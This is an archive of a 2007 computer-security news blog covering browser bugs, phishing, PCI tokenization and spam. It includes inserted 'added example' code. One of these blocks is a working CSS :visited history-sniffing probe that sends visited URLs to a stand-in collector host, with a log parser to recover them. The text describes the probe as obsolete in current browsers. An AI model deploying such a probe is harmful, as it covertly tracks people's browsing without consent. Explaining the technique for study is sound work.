Tuesday, July 31, 2007

Firefox URI Handling Bug

Independent security researcher Billy Rios has uncovered a bug in Firefox. Details are in his blog. The bug involves the way Firefox handles URIs and could lead to remote command execution.

What's interesting is that this affects users who also have IE7 -- with the latest security patches -- installed on their system.

The story was also reported on SearchSecurity and SC magazine, which also ran a follow up article the next day. Alerts were posted by Secunia and CERT.

On a side note, the Rios blog is really interesting and worth a visit in itself. Rios writes about web, browser and application security.

Thursday, July 26, 2007

Exploiting Browser History With CSS

This is a new one. The Giant Geek blog has details of an exploit that reads the browser's history using nothing but CSS. Yes, innocent CSS as an attack vector.

Sample code is in the post.

But all isn't lost. Countermeasures, with links to Firefox extensions, are also posted.
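As an added example (not code from the Giant Geek post or from this blog), here is the mechanism in both halves: a generator for a CSS-only probe page, and the parser that turns the collector's access log back into a list of visited sites. The rule `a:visited { background: url(...) }` makes the browser fetch the background image only for links the user has already visited, so every fetch at the collector reveals one visited URL. The collector hostname, the candidate sites and the log lines are all constructed for the example. This worked in 2007-era browsers; since roughly 2010 browsers restrict what `:visited` may style (no background images), so the probe no longer fires in a current browser.

```python
"""
Added example: CSS :visited history probe (attack page) and the log parser
that recovers what it leaked. All hostnames, paths and log lines are
constructed; nothing here is from the original post.
"""
import re
from html import escape
from urllib.parse import quote, urlsplit, parse_qs

# Constructed: the attacker's collector endpoint and the sites to test for.
COLLECTOR = "https://collector.example/hit"
CANDIDATES = [
    "https://bank.example/login",
    "https://webmail.example/",
    "https://forum.example/",
]


def build_probe_page(candidates, collector=COLLECTOR):
    """Return HTML that leaks which of `candidates` are in the browser history.

    One CSS rule per link: the :visited selector matches only if the URL is
    in history, and only then does the browser request the background image
    from the collector, with the candidate URL as a query parameter.
    """
    rules = []
    links = []
    for i, url in enumerate(candidates):
        beacon = f"{collector}?u={quote(url, safe='')}"
        rules.append(f"#p{i}:visited {{ background: url('{beacon}'); }}")
        # The link is pushed off-screen so the victim sees nothing unusual.
        links.append(f'<a id="p{i}" href="{escape(url, quote=True)}" '
                     f'style="position:absolute;left:-9999px">.</a>')
    return ("<!doctype html><html><head><style>\n"
            + "\n".join(rules)
            + "\n</style></head><body>\n"
            + "\n".join(links)
            + "\n</body></html>\n")


# Combined-log-format line, as written by the collector's web server.
_LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "GET (\S+) HTTP/[\d.]+" (\d{3})')


def visited_from_log(log_lines, collector=COLLECTOR):
    """Recover visited URLs per client IP from the collector's access log."""
    beacon_path = urlsplit(collector).path
    visited = {}
    for line in log_lines:
        m = _LOG_RE.match(line)
        if not m:
            continue
        ip, target, status = m.group(1), m.group(2), m.group(3)
        parts = urlsplit(target)
        if parts.path != beacon_path or status != "200":
            continue
        for u in parse_qs(parts.query).get("u", []):
            visited.setdefault(ip, []).append(u)
    return visited


# Constructed log lines: one client fetched the probe page (not a beacon,
# so ignored) and then triggered the bank and forum beacons.
SAMPLE_LOG = [
    '203.0.113.7 - - [26/Jul/2007:10:00:01 +0000] "GET /probe.html HTTP/1.1" 200 812',
    '203.0.113.7 - - [26/Jul/2007:10:00:02 +0000] '
    '"GET /hit?u=https%3A%2F%2Fbank.example%2Flogin HTTP/1.1" 200 43',
    '203.0.113.7 - - [26/Jul/2007:10:00:02 +0000] '
    '"GET /hit?u=https%3A%2F%2Fforum.example%2F HTTP/1.1" 200 43',
]

if __name__ == "__main__":
    print(build_probe_page(CANDIDATES))
    print(visited_from_log(SAMPLE_LOG))
```

The blunt countermeasure, which is what the linked Firefox extensions approximate, is to stop styling visited links at all; in current Firefox the `layout.css.visited_links_enabled` preference does exactly that.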

DNS Security Issues

A compromised DNS server is worse than a phishing site. It can silently send users who typed the right address to a malicious site hosting malware, with none of the bother of setting up a look-alike phishing site.

DNS administrators were warned this week to patch a hole in BIND 9.

The Debate Over NAC

This is an interesting take on the debate over Network Access Control. Some have said it's dying. Others say it has yet to bloom.

But, in the end, NAC is a set of technologies, not a single tool, according to the article, and is still evolving.

Checking for Patches and Zombies

Secunia recently came out with a beta version of its PSI tool, which checks the software on your computer to see if it's up to date with the latest patches. Details were in Computer World this week.

Computer World also ran an interesting article with a list of tools to check if your machine has been compromised as a zombie.

Mozilla No Better Than IE

Mozilla came clean this week with an admission that its Firefox web browser is just as flawed as Internet Explorer. Details were in Computer World this week.

Mozilla has an active blog about its security and another site, Bugzilla, for reporting and cataloging bugs.

Handling the Press During Incidents

CSO magazine ran an interesting piece recently about how to deal with the media during an incident.

Since a big part of handling incidents is also handling the publicity -- usually negative -- this could come in handy.

Incident response is more than just keeping intruders out of systems. It's also about teamwork within the company, and that, of course, is about people skills, not just technology.

Monday, July 23, 2007

Workplace Privacy and How to Protect It

This article in Computer World covers the basics of what companies can do to watch what employees do online and on their workstations.

It also has links to a long list of products for both conducting surveillance and protecting against it.

iPhone Exploit: Fix It or See It At Black Hat

A group of security researchers has found a flaw in the iPhone that allows remote access to the device and theft of the credentials stored on it.

The researchers, from Independent Security Evaluators, have given Apple two weeks to fix the flaw, or they'll present it at Black Hat next week in Las Vegas.

They've released a paper with details on their web site and posted a video on YouTube.

Sunday, July 22, 2007

The Economist on White Hat Hackers

The Economist ran a fascinating story in this week's issue about white hat hackers and the market for vulnerabilities.

It was well-researched and went into depth about how the market works.

The Economist has run a few good stories in the past year about computer security.

More on Privacy: Google's Cookies and Your Cell Phone

Your cell phone may be spying on you, according to this Computer World report about various types of spyware that can be planted on your cell phone.

Google, the subject of a recent study slamming its privacy practices, came under criticism again this week about its cookie expiration policies.

Chinese Internet Censors Cause E-Mail Chaos

This should come as no surprise to anyone who watches Internet censorship around the world. Chinese censors tied up e-mail last week while adjusting their surveillance system.

I've had a number of other posts on the subject.

Hackers Taking Advantage of Brazil Air Crash

If this isn't the lowest of the low, I don't know what is.

Computer World and Information Week reported how spammers and hackers were taking advantage of Brazil's tragic air crash last week to push malware and spam.

Physical Security and e-Dumpster Diving

Physical security is the easiest part of IT security to overlook. And that makes sense. It isn't very sexy, and it isn't very technical -- on the surface. It's about locks and keys, secured rooms and video cameras, not firewall settings, secure application code, encryption or authentication.

Interestingly enough, in some places the two are slowly merging. Look at biometrics or HSPD-12, a US government initiative to require Smart Cards for both physical access to federal facilities and logical access to its computers.

CSO magazine ran an interesting piece last month about physical security at Starbucks and Computer World had an equally interesting article about dumpster divers now looking for old computer equipment with data. It used to be that dumpster divers just looked for plain old paper trash to steal information.

I also made this point in Chapter 5 of my book, The Little Black Book of Computer Security.

My Article on PCI and Tokenization

I wrote a brief tip last week for SearchSecurity on the benefits of tokenization for PCI compliance.

Tokenization replaces a credit card number with a substitute value, the token, in an electronic transaction. Because the merchant's own systems never hold the real card number, far less of their environment falls under the PCI standard, and they avoid the expense of upgrading point of sale (POS) equipment with costly encryption systems.
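As an added example (not the SearchSecurity tip's code and not any vendor's product), here is a minimal token vault that shows what the scope reduction rests on: the merchant keeps only the token, and the one place that can map it back to the real PAN is the vault, which is the only component still handling card data. The index key, the sample PAN and the token format (issuer prefix and last four kept, the middle randomized, Luhn deliberately broken) are assumptions of this example; a production vault would encrypt the stored PAN and sit in its own network segment.

```python
"""
Added example: a toy PCI token vault. The key, PAN and token format are
constructed assumptions; this is not code from the article.
"""
import hmac
import hashlib
import secrets

# Constructed: key for the lookup index, so the vault never indexes raw PANs.
VAULT_INDEX_KEY = b"constructed-demo-key-not-for-production"

_token_to_pan = {}   # token -> PAN: the only place the real number is kept
_pan_index = {}      # HMAC(PAN) -> token, so a repeat customer gets the same token


def luhn_ok(digits: str) -> bool:
    """Luhn check: True for a well-formed card number."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def _pan_fingerprint(pan: str) -> str:
    """Keyed hash used only to find an existing token for a PAN."""
    return hmac.new(VAULT_INDEX_KEY, pan.encode(), hashlib.sha256).hexdigest()


def tokenize(pan: str) -> str:
    """Return the token for `pan`, creating one on first sight.

    The token keeps the issuer prefix (first 6) and last 4 digits, so receipts
    and reports still work, and replaces the middle digits with random ones.
    It is made to fail the Luhn check so it can never be mistaken for a PAN.
    """
    if not (pan.isdigit() and 13 <= len(pan) <= 19 and luhn_ok(pan)):
        raise ValueError("not a well-formed card number")
    fp = _pan_fingerprint(pan)
    if fp in _pan_index:
        return _pan_index[fp]
    middle = len(pan) - 10
    while True:
        token = (pan[:6]
                 + "".join(secrets.choice("0123456789") for _ in range(middle))
                 + pan[-4:])
        if token != pan and not luhn_ok(token) and token not in _token_to_pan:
            break
    _token_to_pan[token] = pan
    _pan_index[fp] = token
    return token


def detokenize(token: str) -> str:
    """Map a token back to the PAN. Only the vault, inside PCI scope, can do this."""
    try:
        return _token_to_pan[token]
    except KeyError:
        raise KeyError("unknown token") from None


if __name__ == "__main__":
    t = tokenize("4111111111111111")   # standard test PAN, passes Luhn
    print(t, detokenize(t))
```

Everything outside the vault sees only `tokenize()`'s output; an attacker who dumps the merchant's order database gets values that neither pass Luhn nor can be charged.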

Wednesday, July 18, 2007

Top Cybercrime Countries

This news is a bit dated since it's about a Symantec report from a few weeks ago. But MSNBC ran a nice story two days ago about the top countries for cybercrime.

It has some good links to articles and a cybercrime atlas in Forbes.

Tuesday, July 17, 2007

Boeing Cybersecurity Can't Get Off The Ground

Italians Arrest 26 for Phishing Attack

Italian authorities arrested 26 people accused of running a phishing scam. Details are in Computer World and the Guardia di Finanza web site in Italian.

I was in Italy in May and posted from there about the Guardia di Finanza.

The Guardia di Finanza arrested 26 people for phishing activity using scam e-mails. Details in Italian are on the Guardia di Finanza web site.

I was in Italy in May and wrote about the Guardia di Finanza.

Two Interesting Hacks

This is a fascinating story about the Athens Affair, one of the most daring break-ins to a cell phone network. This story was also on Digg.

This is a much less spectacular hack, for getting into pay web sites for free.

Insider Threat Now Biggest Concern

According to Information Week's 10th annual Global Information Security survey, conducted with Accenture, employees are the biggest threat to a company's network.

Employees leak information through e-mail, IM and peer-to-peer networks.

I had a blog post on insider profiling in May based on my TechTarget article the same day.

A Mac Bug -- Is That Possible?

Maybe, according to the Information Security Sell Out blog, which claims to have written an exploit in a few hours for a bug just fixed in May.

More details are in this article in Computer World, which has links to the sad saga of Apple exploits over the past few months.

More Random Thoughts on iPhone Security

The good news is that hackers have been unable to unlock the iPhone. And, oh, are they trying. What's stopping them is the signature check on the bootloader, which is signed with a 1,024-bit RSA key.

But then, there's the web dialer on its Safari web browser. A bug uncovered by SPI Dynamics could allow someone to track phone calls made through the browser. The issue was reported in SPI's blog, Errata Security and in The Register. There's also a Wiki devoted to the subject.

Apparently, there are also ways to get a user's e-mail and track other web activity.

And this is just the beginning. How many weeks has the iPhone been out already?

Israeli Military Program Spawns Startups

It's not immediately obvious until you meet them at trade shows and on sales calls, but Israelis head a lot of IT security startups.

Besides their obvious expertise in military and physical security, Israelis are also very hi-tech.

Here's part of the reason why. It's a program called Talpiot, which was recently profiled in The Wall Street Journal. There's more information on Wikipedia and Doug Henwood's blog.

Saturday, July 14, 2007

Jihad Moves to the Internet

The Economist in this week's issue had a fascinating briefing about jihad online. It followed the trail of a cyberjihadist who devoted all his energies to spreading his cause on the web rather than on the battlefield.

The article gave a good overview of the extent of the issue. The Internet's anonymity makes it fertile ground for publicity-shy terrorist organizers, but the article notes it has weaknesses for them in this area too.

The Internet served mostly as an organizing and indoctrination tool, the article said, and wasn't a replacement for live activity on the ground.

Unrelated to the Economist article, an electronic jihad site was taken down about two weeks ago by authorities.

Friday, July 13, 2007

Spike in PDF Spam

An Israeli security firm reported a spike in PDF spam earlier this week. It is a variant of image spam: the pitch is carried in an attachment (here a PDF, often with the text rendered as an image inside it) rather than in the message body. A filter that scores only the body text sees nothing objectionable and often lets the e-mail through.

The technique has only been seen in the past few weeks, according to the firm, and the messages are now being sent from computers in 167 countries.

The discovery is interesting in light of the fact that a recent report by Symantec claims image spam has been declining. Not so, says MessageLabs, another e-mail security vendor.
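As an added example (not from the vendor reports cited above), here is the filter-side view of the evasion: a heuristic that flags a message whose only substance is a PDF or image attachment, run over constructed MIME messages. The sender addresses, bodies, attachment bytes and the 40-character body threshold are all assumptions of this example.

```python
"""
Added example: a heuristic for attachment-carried spam, with constructed
sample messages. Not code from any product or from the original post.
"""
from email import message_from_bytes
from email.message import EmailMessage

ATTACHMENT_TYPES = {"application/pdf", "image/gif", "image/jpeg", "image/png"}
MIN_BODY_CHARS = 40   # assumption: below this, the text body carries no real message


def looks_like_attachment_spam(raw: bytes) -> bool:
    """True when the message has a PDF/image attachment and (almost) no text."""
    msg = message_from_bytes(raw)
    body_chars = 0
    carrier = False
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        if ctype == "text/plain":
            payload = part.get_payload(decode=True) or b""
            body_chars += len(payload.decode(errors="replace").strip())
        elif ctype in ATTACHMENT_TYPES or (part.get_filename() or "").lower().endswith(".pdf"):
            carrier = True
    return carrier and body_chars < MIN_BODY_CHARS


def _build(subject: str, body: str, pdf: bytes = b"") -> bytes:
    """Construct a sample message; `pdf` is a fake attachment body."""
    m = EmailMessage()
    m["From"] = "sender@example.net"
    m["To"] = "victim@example.org"
    m["Subject"] = subject
    m.set_content(body)
    if pdf:
        m.add_attachment(pdf, maintype="application", subtype="pdf", filename="offer.pdf")
    return m.as_bytes()


# Constructed samples: a PDF-only pitch, a normal mail with a PDF invoice,
# and a short text-only note with no attachment.
SPAM_SAMPLE = _build("Hot stock tip", "see attached", b"%PDF-1.4 fake stock pitch")
HAM_SAMPLE = _build(
    "July invoice",
    "Hi, attached is the invoice for the July work we discussed on the phone. "
    "Let me know if the line items look right before I submit it.",
    b"%PDF-1.4 fake invoice",
)
PLAIN_SAMPLE = _build("lunch?", "ok")

if __name__ == "__main__":
    for name, raw in [("spam", SPAM_SAMPLE), ("ham", HAM_SAMPLE), ("plain", PLAIN_SAMPLE)]:
        print(name, looks_like_attachment_spam(raw))
```

Legitimate one-line "see attached" mails exist, so this belongs in a scoring pipeline next to sender reputation and attachment hashing, not as a hard block.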

My Java Security Article on SearchSecurity

My article on Java Security came out yesterday on SearchSecurity.

There are some interesting links on buffer overflows, XSS and other application-level attacks.

Wednesday, July 11, 2007

A Security Professional's Toolbox

Here's a nice list of what should be in every security professional's toolkit.

Another great list, of course, is the old standby from Insecure.Org.

Tuesday, July 10, 2007

The Debate on Cyberterrorism Goes On

This might sound like beating a dead horse, but Information Week had an article last week summarizing the key points of the it-is-or-it-isn't-cyberterrorism debate.

The article discussed recent incidents including those in Russia and the Electronic Jihad web site.

Six Month Report Card on Vista Security

As a follow up to a report he had done six months ago, Jeff Jones recently released a report showing that security for Windows Vista was continuing to improve.

Jones reported the results in a post on a CSO blog. There was a link to the full report.

Jones works for Microsoft and admitted that he wasn't an unbiased observer. The results are interesting, nonetheless, since he compares them with Linux and other platforms.

It's still worth the read.

Cybercrime Police Blotter

The cybercrime beat never stops. Two more rings were broken up this week, according to reports in both the mainstream and trade press.

One involved a classic stock scam that has been making the rounds lately.

The other was a four-member gang caught with 200,000 credit card numbers.

Monday, July 09, 2007

Plug-And-Play Phishing Kit

This is an unwelcome development in the world of phishing, a plug-and-play phishing kit that can be installed in seconds.

No muss, no fuss for the neophyte phisher looking to break into the big time.

The kit was discovered by RSA during a forensics investigation into a phishing attack.

Not All Data Breaches End in ID Theft

A report last week by the Government Accountability Office (GAO) said that large-scale data breaches don't always result in equally large-scale cases of identity theft.

The report said that wide-ranging data breach notification laws could put a strain on businesses and result in a Chicken Little-like scenario where the sky was falling for every breach, even small ones.

The point is well taken, since the bulk of identity theft is still physical, coming from theft of wallets and documents in offices. But it doesn't absolve companies of the responsibility to handle customer data carefully, or, in some cases, to notify individuals when their data has been compromised.

Alan Paller of SANS told Computer World that he agreed with the report's findings and that lawmakers need to focus on attack-based defenses rather than data breach notification.

The story was also reported on CNET.

Electronic Jihad Site Taken Down

This is an interesting twist on cyberterrorism. The Al-jinan web site, taken down last week by law enforcement authorities, allowed users to download an application, complete with a Windows GUI, for conducting Denial of Service (DoS) attacks against web sites perceived to be anti-Islamic.

The site was up for over four years. Although it was hosted here in the US, the domain was registered in Beirut, keeping control of the site outside the long arm of US authorities.

Tech Experts on ID Theft Protection

Market Watch had this piece with interviews of security experts on how they protect themselves from identity theft.

But the most interesting of the bunch was Frank Abagnale, the infamous con man who was the subject of the film Catch Me If You Can.

iPhone Security Hype

Here are some interesting thoughts on iPhone security. Jim Damoulakis says in Computer World that personal devices have already penetrated the corporate network. From that perspective, the iPhone isn't anything new. On the other hand, he says that if your iPhone is more secure than your laptop, then you've got bigger security problems than just the iPhone.

Another Computer World article on iPhone security notes that Apple hasn't released a development kit yet for the phone. The article says this raises the bar for hackers, who must take the phone apart and use specialized tools to break into it. In other words, physical hacking takes more work than software exploits, according to the article.

China Tops in Malware

This is an interesting article from InfoWorld last week about malware statistics.

It noted that China is the world's largest source of malware, at 40 percent of malware generated worldwide, almost double the 21 percent it held in May.

The article said that a good chunk of software used in China is pirated, making it an attractive target for malware.

Security Consultant on Web 2.0 Hacking

Larry Greenemeier of Information Week had a real thought-provoking post last week on his security blog about hacking Web 2.0 web sites.

He cited five web services that could be targeted by hackers from a post on the GNUCITIZEN blog.

SearchSMB Piece on PCI Compliance for SMBs

This article on PCI compliance for SMBs came out today in SearchSMB.

The angle is a little different than other articles, including mine, on PCI compliance. Instead of going through each of the standard's 12 points and detailing how to meet each one, I only dealt with a few points I thought would be important to an SMB.

More Security Videos

Here are some new security videos from Security Freak. They cover basic skills for anyone in the IT security field, such as using hacking and security tools for penetration and vulnerability testing.

Last month, I posted links to a nice series of security awareness videos and another about wireless security from Chris Pirillo.

Kabay's Annual INFOSEC Now Online

Prof. Mich Kabay in his Security Strategies column in Network World announced last week that his annual guide, INFOSEC, was now online.

This fantastic and in-depth resource is compiled annually by Prof. Kabay.

Sunday, July 08, 2007

Dangers of Third-Party Access

Here's something I wrote for SearchSecurity about the dangers of granting third-party access to your systems.

This was adapted from one of my recent Ask The Expert questions.

A lot of this is plain common sense.

Monday, July 02, 2007

Timing Isn't Everything to Hackers

Contrary to popular belief, hackers don't hold their most potent exploits back until right after Patch Tuesday. Hackers are skilled, but still not bright enough to stockpile exploits, Craig Shmugar of McAfee told Computer World last week.

Interestingly, Ira Winkler, in a new book, doesn't give criminals much credit either in the brains department.

Harry Potter Bitten By Worm

Harry Potter fans need to watch out for a malicious worm hiding in an e-mail purporting to contain the final installment of the famous book series.

Details were provided by Sophos and the story was reported on Computer World.

Sunday, July 01, 2007

Webroot Guide to Child Safety Online

Information Week reported about a new guide for parents from Webroot, an anti-malware company, on child safety online.

More details are on Webroot's web site with a link to the guide itself.

Bots on MySpace and Trojans in Shockwave

Malware is everywhere. You can't escape it. The old rule that it only sat on porn, gambling and other unsavory sites doesn't hold true anymore. Anyone can get infected through regular surfing on ordinary web sites.

Here's two reports about bots on MySpace and Trojans in Shockwave.

Along the same lines, this is a story in eWeek about research by Dr. James Blascovich about the psychology of clicking on links, and why even tech-savvy people can get hooked.

Malware is even in greeting cards, according to this Computer World article.

The lesson to be learned, I guess, is to just stop surfing the web, at all. But definitely don't open any greeting cards. They might be rigged.

Bloggers a Danger on Corporate Laptops

Here's an article from Microsoft Certified Professional online about how blogging from company laptops is a security risk. Russ Cooper references another article on SearchSecurity on the same subject.

What they're saying is that criminals and data thieves use data mining tools to piece together random bits of information posted on blogs. In some cases, employees blogging from their laptops may inadvertently leak bits and pieces of stuff that can be tied together.

Laptops in general have a spotty security record in many companies. I wrote about some tips for laptop security recently for SearchSMB.

New Ankit Fadia Book and Hacker Disassembling

I saw a copy this week of Ankit Fadia's new book, Intrusion Alert: An Ethical Hacking Guide to Intrusion Detection, at Borders and picked it up.

Like Fadia's two previous books, it's a basic introduction to hacking and computer security. Both of his two previous books have come out in second editions: The Unofficial Guide to Ethical Hacking and Network Security: A Hacker's Perspective.

Another book, on reverse engineering code, Hacker Disassembling, also just came out in its second edition. The book goes into detail about using debuggers and other tools for disassembling and decompiling code. It has some new sections on Linux and comes with a CD.